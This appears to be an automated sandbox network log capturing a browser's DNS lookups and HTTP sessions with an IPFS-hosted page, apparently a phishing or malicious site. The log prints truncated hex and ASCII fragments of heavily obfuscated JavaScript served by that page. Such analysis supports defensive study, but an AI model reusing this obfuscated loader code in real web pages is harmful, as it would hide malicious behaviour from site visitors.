                                                  Oct 31, 2024 20:49:40.782826900 CET1.1.1.1192.168.2.40x40dcNo error (0)d12y7sg0iam4lc.cloudfront.net18.65.39.45A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:40.782826900 CET1.1.1.1192.168.2.40x40dcNo error (0)d12y7sg0iam4lc.cloudfront.net18.65.39.84A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:42.913230896 CET1.1.1.1192.168.2.40xb557No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:42.913784027 CET1.1.1.1192.168.2.40x7ad1No error (0)www.google.com65IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.068386078 CET1.1.1.1192.168.2.40xc57No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.068428040 CET1.1.1.1192.168.2.40xf10No error (0)www.google.com65IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.124850035 CET1.1.1.1192.168.2.40xbc6bNo error (0)image.thum.io3.230.32.200A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.124850035 CET1.1.1.1192.168.2.40xbc6bNo error (0)image.thum.io184.72.170.117A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:43.124850035 CET1.1.1.1192.168.2.40xbc6bNo error (0)image.thum.io54.197.225.68A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:49:54.095499992 CET1.1.1.1192.168.2.40xd5ddNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 31, 2024 20:49:54.095499992 CET1.1.1.1192.168.2.40xd5ddNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:50:31.766154051 CET1.1.1.1192.168.2.40xba5fNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 31, 2024 20:50:31.766154051 CET1.1.1.1192.168.2.40xba5fNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                  Oct 31, 2024 20:50:51.358135939 CET1.1.1.1192.168.2.40xc67aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Oct 31, 2024 20:50:51.358135939 CET1.1.1.1192.168.2.40xc67aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                  • bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link
                                                  • https:
                                                    • stackpath.bootstrapcdn.com
                                                    • d12y7sg0iam4lc.cloudfront.net
                                                    • www.google.com
                                                    • image.thum.io
                                                  • fs.microsoft.com
                                                  • otelrules.azureedge.net
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449736209.94.90.34432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:40 UTC717OUTGET / HTTP/1.1
                                                  Host: bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  sec-ch-ua-platform: "Windows"
                                                  Upgrade-Insecure-Requests: 1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: navigate
                                                  Sec-Fetch-User: ?1
                                                  Sec-Fetch-Dest: document
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:40 UTC1071INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:49:40 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-headers: Content-Type
                                                  access-control-allow-headers: Range
                                                  access-control-allow-headers: User-Agent
                                                  access-control-allow-headers: X-Requested-With
                                                  access-control-allow-methods: GET
                                                  access-control-allow-methods: HEAD
                                                  access-control-allow-methods: OPTIONS
                                                  access-control-allow-origin: *
                                                  access-control-expose-headers: Content-Length
                                                  access-control-expose-headers: Content-Range
                                                  access-control-expose-headers: X-Chunked-Output
                                                  access-control-expose-headers: X-Ipfs-Path
                                                  access-control-expose-headers: X-Ipfs-Roots
                                                  access-control-expose-headers: X-Stream-Output
                                                  Cache-Control: public, max-age=29030400, immutable
                                                  x-ipfs-path: /ipfs/bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma/
                                                  x-ipfs-roots: bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma
                                                  x-ipfs-pop: rainbow-sv15-01
                                                  CF-Cache-Status: HIT
                                                  Age: 37433
                                                  Server: cloudflare
                                                  CF-RAY: 8db62b6dc97f0bf3-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-31 19:49:40 UTC298INData Raw: 37 62 38 31 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 38 35 31 31 28 5f 30 78 31 32 63 36 32 32 2c 5f 30 78 33 33 65 61 30 31 29 7b 76 61 72 20 5f 30 78 34 65 37 31 66 36 3d 5f 30 78 33 38 36 39 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 38 35 31 31 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 38 62 66 31 38 2c 5f 30 78 33 32 61 34 64 65 29 7b 5f 30 78 31 38 62 66 31 38 3d 5f 30 78 31 38 62 66 31 38 2d 28 2d 30 78 31 66 65 35 2b 30 78 31 2a 30 78 31 33 33 35 2b 2d 30 78 31 32 65 2a 2d 30 78 63 29 3b 76 61 72 20 5f 30 78 35 32 64 62 38 32 3d 5f 30 78 34 65 37 31 66 36 5b 5f 30 78 31 38 62 66 31 38 5d 3b 72 65 74 75 72 6e 20 5f 30 78 35 32 64 62 38 32 3b 7d 2c 5f
                                                  Data Ascii: 7b81<script language="javascript">function _0x8511(_0x12c622,_0x33ea01){var _0x4e71f6=_0x3869();return _0x8511=function(_0x18bf18,_0x32a4de){_0x18bf18=_0x18bf18-(-0x1fe5+0x1*0x1335+-0x12e*-0xc);var _0x52db82=_0x4e71f6[_0x18bf18];return _0x52db82;},_
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 5f 30 78 38 35 31 31 2c 5f 30 78 33 62 63 61 63 61 3d 5f 30 78 38 35 31 31 2c 5f 30 78 32 66 38 63 34 30 3d 5f 30 78 38 35 31 31 2c 5f 30 78 31 64 34 39 65 34 3d 5f 30 78 38 35 31 31 2c 5f 30 78 36 34 63 39 35 36 3d 5f 30 78 38 35 31 31 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 62 64 36 36 63 2c 5f 30 78 34 33 61 61 65 31 29 7b 76 61 72 20 5f 30 78 33 65 39 36 62 37 3d 5f 30 78 38 35 31 31 2c 5f 30 78 34 31 37 31 65 34 3d 5f 30 78 38 35 31 31 2c 5f 30 78 31 39 64 32 62 62 3d 5f 30 78 38 35 31 31 2c 5f 30 78 35 62 37 30 34 39 3d 5f 30 78 38 35 31 31 2c 5f 30 78 32 33 63 32 66 31 3d 5f 30 78 38 35 31 31 2c 5f 30 78 31 62 33 63 33 63 3d 5f 30 78 35 62 64 36 36 63 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 33 31 66 62 36
                                                  Data Ascii: _0x8511,_0x3bcaca=_0x8511,_0x2f8c40=_0x8511,_0x1d49e4=_0x8511,_0x64c956=_0x8511;(function(_0x5bd66c,_0x43aae1){var _0x3e96b7=_0x8511,_0x4171e4=_0x8511,_0x19d2bb=_0x8511,_0x5b7049=_0x8511,_0x23c2f1=_0x8511,_0x1b3c3c=_0x5bd66c();while(!![]){try{var _0x31fb6
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 33 31 66 39 33 33 3d 21 5b 5d 2c 5f 30 78 66 30 65 61 61 65 3b 7d 3b 7d 28 29 29 2c 5f 30 78 35 32 64 62 38 32 3d 5f 30 78 61 66 63 65 34 30 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 35 35 36 38 64 33 3d 5f 30 78 38 35 31 31 2c 5f 30 78 35 63 61 34 62 64 3d 5f 30 78 38 35 31 31 2c 5f 30 78 34 39 30 66 35 32 3d 5f 30 78 38 35 31 31 2c 5f 30 78 33 33 61 38 39 31 3d 5f 30 78 38 35 31 31 2c 5f 30 78 32 35 61 65 35 65 3d 5f 30 78 38 35 31 31 2c 5f 30 78 34 34 35 39 32 36 3d 7b 7d 3b 5f 30 78 34 34 35 39 32 36 5b 5f 30 78 35 35 36 38 64 33 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 37 5c 78 33 31 5c 78 36 35 27 29 5d 3d 5f 30 78 35 35 36 38 64 33 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 34 5c 78 33 32 5c 78 33 33 27 29 2b 5f 30 78 35 63
                                                  Data Ascii: 31f933=![],_0xf0eaae;};}()),_0x52db82=_0xafce40(this,function(){var _0x5568d3=_0x8511,_0x5ca4bd=_0x8511,_0x490f52=_0x8511,_0x33a891=_0x8511,_0x25ae5e=_0x8511,_0x445926={};_0x445926[_0x5568d3('\x30\x78\x37\x31\x65')]=_0x5568d3('\x30\x78\x34\x32\x33')+_0x5c
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 31 5c 78 36 31 5c 78 35 39 5c 78 36 61 5c 78 35 37 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 63 34 38 62 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 63 34 38 62 64 28 29 3b 7d 7d 2c 5f 30 78 64 38 30 32 37 65 3b 74 72 79 7b 76 61 72 20 5f 30 78 35 35 62 64 34 61 3d 5f 30 78 65 66 63 30 34 62 5b 27 5c 78 36 35 5c 78 37 61 5c 78 35 36 5c 78 34 34 5c 78 36 65 27 5d 28 46 75 6e 63 74 69 6f 6e 2c 5f 30 78 65 66 63 30 34 62 5b 5f 30 78 35 36 64 61 61 36 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 34 5c 78 36 31 5c 78 36 33 27 29 5d 28 5f 30 78 65 66 63 30 34 62 5b 5f 30 78 31 66 65 65 31 34 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 34 5c 78 36 31 5c 78 36 33 27 29 5d 28 5f 30 78 65 66 63 30 34 62 5b 5f 30 78 33 34 38 30 33 64 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 36
                                                  Data Ascii: 1\x61\x59\x6a\x57':function(_0x2c48bd){return _0x2c48bd();}},_0xd8027e;try{var _0x55bd4a=_0xefc04b['\x65\x7a\x56\x44\x6e'](Function,_0xefc04b[_0x56daa6('\x30\x78\x34\x61\x63')](_0xefc04b[_0x1fee14('\x30\x78\x34\x61\x63')](_0xefc04b[_0x34803d('\x30\x78\x36
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 5c 78 34 34 5c 78 34 34 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 37 61 64 32 35 2c 5f 30 78 35 32 31 37 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 37 61 64 32 35 28 5f 30 78 35 32 31 37 35 37 29 3b 7d 2c 27 5c 78 36 64 5c 78 36 35 5c 78 36 35 5c 78 34 36 5c 78 36 61 27 3a 5f 30 78 34 36 37 61 33 32 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 31 5c 78 33 39 5c 78 33 34 27 29 2c 27 5c 78 36 66 5c 78 35 35 5c 78 35 37 5c 78 36 65 5c 78 35 39 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 35 39 31 30 2c 5f 30 78 32 30 64 34 34 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 34 35 39 31 30 2b 5f 30 78 32 30 64 34 34 37 3b 7d 2c 27 5c 78 34 36 5c 78 34 38 5c 78 36 31 5c 78 35 33 5c 78 37 61 27 3a 5f 30 78 37 35 61 63 64 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 32 5c
                                                  Data Ascii: \x44\x44':function(_0x57ad25,_0x521757){return _0x57ad25(_0x521757);},'\x6d\x65\x65\x46\x6a':_0x467a32('\x30\x78\x31\x39\x34'),'\x6f\x55\x57\x6e\x59':function(_0x445910,_0x20d447){return _0x445910+_0x20d447;},'\x46\x48\x61\x53\x7a':_0x75acd('\x30\x78\x32\
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 29 3a 5f 30 78 65 65 36 63 61 39 5b 27 5c 78 37 32 5c 78 35 35 5c 78 37 35 5c 78 36 36 5c 78 37 34 27 5d 28 5f 30 78 31 32 63 36 32 32 29 3b 7d 29 28 29 3b 7d 28 29 29 3b 76 61 72 20 5f 30 78 33 33 32 30 34 30 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 66 34 33 38 62 34 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 34 61 39 63 34 2c 5f 30 78 34 37 64 65 31 38 29 7b 76 61 72 20 5f 30 78 31 31 37 32 31 61 3d 5f 30 78 66 34 33 38 62 34 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 5f 30 78 34 37 64 65 31 38 29 7b 76 61 72 20 5f 30 78 35 30 35 35 63 35 3d 5f 30 78 34 37 64 65 31 38 5b 27 5c 78 36 31 5c 78 37 30 5c 78 37 30 5c 78 36 63 5c 78 37 39 27 5d 28 5f 30 78 32 34 61 39 63 34 2c 61 72 67 75 6d 65 6e 74 73
                                                  Data Ascii: ):_0xee6ca9['\x72\x55\x75\x66\x74'](_0x12c622);})();}());var _0x332040=(function(){var _0xf438b4=!![];return function(_0x24a9c4,_0x47de18){var _0x11721a=_0xf438b4?function(){if(_0x47de18){var _0x5055c5=_0x47de18['\x61\x70\x70\x6c\x79'](_0x24a9c4,arguments
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 78 36 66 27 2b 5f 30 78 31 64 63 65 30 65 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 32 5c 78 36 34 5c 78 33 36 27 29 2b 5f 30 78 31 64 63 65 30 65 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 36 5c 78 33 31 5c 78 33 38 27 29 2b 5f 30 78 31 64 63 65 30 65 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 34 5c 78 33 38 5c 78 33 34 27 29 2b 27 5c 78 37 32 5c 78 36 65 5c 78 32 30 5c 78 37 34 5c 78 36 38 27 2b 27 5c 78 36 39 5c 78 37 33 5c 78 32 32 5c 78 32 39 5c 78 32 38 27 2b 27 5c 78 32 30 5c 78 32 39 27 2c 27 5c 78 36 65 5c 78 34 63 5c 78 36 64 5c 78 35 32 5c 78 36 31 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 34 63 33 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 33 64 34 63 33 33 28 29 3b 7d 2c 27 5c 78 34 31 5c 78 35 33 5c 78 34 33 5c 78 35 39 5c 78 37 35 27 3a 66 75 6e 63
                                                  Data Ascii: x6f'+_0x1dce0e('\x30\x78\x32\x64\x36')+_0x1dce0e('\x30\x78\x36\x31\x38')+_0x1dce0e('\x30\x78\x34\x38\x34')+'\x72\x6e\x20\x74\x68'+'\x69\x73\x22\x29\x28'+'\x20\x29','\x6e\x4c\x6d\x52\x61':function(_0x3d4c33){return _0x3d4c33();},'\x41\x53\x43\x59\x75':func
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 5d 28 5f 30 78 32 37 63 33 33 35 2c 5f 30 78 61 34 33 61 37 65 29 3b 7d 2c 27 5c 78 37 31 5c 78 36 34 5c 78 35 30 5c 78 36 64 5c 78 37 35 27 3a 5f 30 78 31 65 39 62 35 37 5b 27 5c 78 36 39 5c 78 36 66 5c 78 36 61 5c 78 34 38 5c 78 34 36 27 5d 2c 27 5c 78 37 39 5c 78 35 37 5c 78 37 38 5c 78 36 64 5c 78 37 31 27 3a 5f 30 78 31 65 39 62 35 37 5b 27 5c 78 36 63 5c 78 37 39 5c 78 37 35 5c 78 35 32 5c 78 35 38 27 5d 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 5c 78 33 33 27 3a 76 61 72 20 5f 30 78 32 33 62 39 64 65 3d 5f 30 78 31 65 39 62 35 37 5b 5f 30 78 33 36 34 31 31 37 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 33 5c 78 36 33 5c 78 33 32 27 29 5d 28 5f 30 78 33 66 63 38 36 36 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 5c 78 33 34 27 3a 66 6f 72 28 76
                                                  Data Ascii: ](_0x27c335,_0xa43a7e);},'\x71\x64\x50\x6d\x75':_0x1e9b57['\x69\x6f\x6a\x48\x46'],'\x79\x57\x78\x6d\x71':_0x1e9b57['\x6c\x79\x75\x52\x58']};continue;case'\x33':var _0x23b9de=_0x1e9b57[_0x364117('\x30\x78\x33\x63\x32')](_0x3fc866);continue;case'\x34':for(v
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 78 33 35 27 3a 76 61 72 20 5f 30 78 33 66 63 38 36 36 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 32 36 39 34 33 63 3d 5f 30 78 37 62 30 38 66 31 2c 5f 30 78 32 32 31 31 33 31 3d 5f 30 78 37 62 30 38 66 31 2c 5f 30 78 31 65 31 34 30 36 3d 5f 30 78 33 36 34 31 31 37 2c 5f 30 78 64 35 63 64 64 63 3d 5f 30 78 31 64 63 65 30 65 2c 5f 30 78 34 30 35 65 65 33 3b 74 72 79 7b 5f 30 78 34 30 35 65 65 33 3d 5f 30 78 31 38 30 31 31 66 5b 5f 30 78 32 36 39 34 33 63 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 36 5c 78 33 31 5c 78 33 34 27 29 5d 28 46 75 6e 63 74 69 6f 6e 2c 5f 30 78 31 38 30 31 31 66 5b 5f 30 78 32 36 39 34 33 63 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 36 5c 78 33 36 5c 78 33 31 27 29 5d 28 5f 30 78 31 38 30 31 31 66 5b 5f 30 78 31 65 31 34 30
                                                  Data Ascii: x35':var _0x3fc866=function(){var _0x26943c=_0x7b08f1,_0x221131=_0x7b08f1,_0x1e1406=_0x364117,_0xd5cddc=_0x1dce0e,_0x405ee3;try{_0x405ee3=_0x18011f[_0x26943c('\x30\x78\x36\x31\x34')](Function,_0x18011f[_0x26943c('\x30\x78\x36\x36\x31')](_0x18011f[_0x1e140
                                                  2024-10-31 19:49:40 UTC1369INData Raw: 78 33 30 5c 78 37 38 5c 78 33 33 5c 78 33 31 5c 78 36 32 27 29 2b 5f 30 78 31 64 34 39 65 34 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 35 5c 78 33 39 5c 78 33 36 27 29 2b 5f 30 78 31 64 34 39 65 34 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 32 5c 78 36 34 5c 78 33 34 27 29 2b 5f 30 78 36 34 63 39 35 36 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 36 5c 78 36 35 5c 78 36 31 27 29 2b 27 5c 78 32 35 5c 78 33 36 5c 78 33 35 5c 78 32 35 5c 78 33 32 27 2b 5f 30 78 33 62 63 61 63 61 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 32 5c 78 33 36 5c 78 36 31 27 29 2b 27 5c 78 33 35 5c 78 33 30 5c 78 32 35 5c 78 33 36 5c 78 34 36 27 2b 27 5c 78 32 35 5c 78 33 37 5c 78 33 32 5c 78 32 35 5c 78 33 37 27 2b 5f 30 78 33 62 63 61 63 61 28 27 5c 78 33 30 5c 78 37 38 5c 78 33 36 5c 78 36 33 5c
                                                  Data Ascii: x30\x78\x33\x31\x62')+_0x1d49e4('\x30\x78\x35\x39\x36')+_0x1d49e4('\x30\x78\x32\x64\x34')+_0x64c956('\x30\x78\x36\x65\x61')+'\x25\x36\x35\x25\x32'+_0x3bcaca('\x30\x78\x32\x36\x61')+'\x35\x30\x25\x36\x46'+'\x25\x37\x32\x25\x37'+_0x3bcaca('\x30\x78\x36\x63\


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449735209.94.90.34432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:40 UTC709OUTGET /img/bg-image.jpg HTTP/1.1
                                                  Host: bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:41 UTC1141INHTTP/1.1 404 Not Found
                                                  Date: Thu, 31 Oct 2024 19:49:40 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 188
                                                  Connection: close
                                                  access-control-allow-headers: Content-Type
                                                  access-control-allow-headers: Range
                                                  access-control-allow-headers: User-Agent
                                                  access-control-allow-headers: X-Requested-With
                                                  access-control-allow-methods: GET
                                                  access-control-allow-methods: HEAD
                                                  access-control-allow-methods: OPTIONS
                                                  access-control-allow-origin: *
                                                  access-control-expose-headers: Content-Length
                                                  access-control-expose-headers: Content-Range
                                                  access-control-expose-headers: X-Chunked-Output
                                                  access-control-expose-headers: X-Ipfs-Path
                                                  access-control-expose-headers: X-Ipfs-Roots
                                                  access-control-expose-headers: X-Stream-Output
                                                  x-content-type-options: nosniff
                                                  x-ipfs-path: /ipfs/bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma/img/bg-image.jpg
                                                  x-ipfs-pop: rainbow-sv15-01
                                                  CF-Cache-Status: HIT
                                                  Set-Cookie: __cflb=02DiuGkv5ni2nQgA5peJLD7iSo9uMP49CoXBowdQwHEJQ; SameSite=None; Secure; path=/; expires=Fri, 01-Nov-24 18:49:40 GMT; HttpOnly
                                                  Server: cloudflare
                                                  CF-RAY: 8db62b7248eb0bd8-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-31 19:49:41 UTC188INData Raw: 66 61 69 6c 65 64 20 74 6f 20 72 65 73 6f 6c 76 65 20 2f 69 70 66 73 2f 62 61 66 79 62 65 69 64 64 76 6f 33 69 6c 36 33 68 65 61 67 6f 75 63 6b 74 32 70 74 33 63 72 34 78 78 69 6f 67 72 33 74 75 61 6e 73 67 71 67 6d 6f 74 36 35 61 68 6a 73 66 6d 61 2f 69 6d 67 2f 62 67 2d 69 6d 61 67 65 2e 6a 70 67 3a 20 6e 6f 20 6c 69 6e 6b 20 6e 61 6d 65 64 20 22 69 6d 67 22 20 75 6e 64 65 72 20 62 61 66 79 62 65 69 64 64 76 6f 33 69 6c 36 33 68 65 61 67 6f 75 63 6b 74 32 70 74 33 63 72 34 78 78 69 6f 67 72 33 74 75 61 6e 73 67 71 67 6d 6f 74 36 35 61 68 6a 73 66 6d 61 0a
                                                  Data Ascii: failed to resolve /ipfs/bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma/img/bg-image.jpg: no link named "img" under bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449738104.18.11.2074432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:41 UTC635OUTGET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1
                                                  Host: stackpath.bootstrapcdn.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:41 UTC952INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:49:41 GMT
                                                  Content-Type: text/css; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CDN-PullZone: 252412
                                                  CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                  CDN-RequestCountryCode: US
                                                  Vary: Accept-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: public, max-age=31919000
                                                  ETag: W/"816af0eddd3b4822c2756227c7e7b7ee"
                                                  Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT
                                                  CDN-ProxyVer: 1.04
                                                  CDN-RequestPullSuccess: True
                                                  CDN-RequestPullCode: 200
                                                  CDN-CachedAt: 10/06/2024 16:28:38
                                                  CDN-EdgeStorageId: 1067
                                                  timing-allow-origin: *
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  CDN-Status: 200
                                                  CDN-RequestTime: 0
                                                  CDN-RequestId: 4b0ce2155655928fe06b23f1ce48bd74
                                                  CDN-Cache: HIT
                                                  CF-Cache-Status: HIT
                                                  Age: 694137
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Server: cloudflare
                                                  CF-RAY: 8db62b7668d52fe4-DFW
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-31 19:49:41 UTC417INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66
                                                  Data Ascii: 7bfa/*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors * Copyright 2011-2020 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--blue:#007bff;--indigo:#6610f
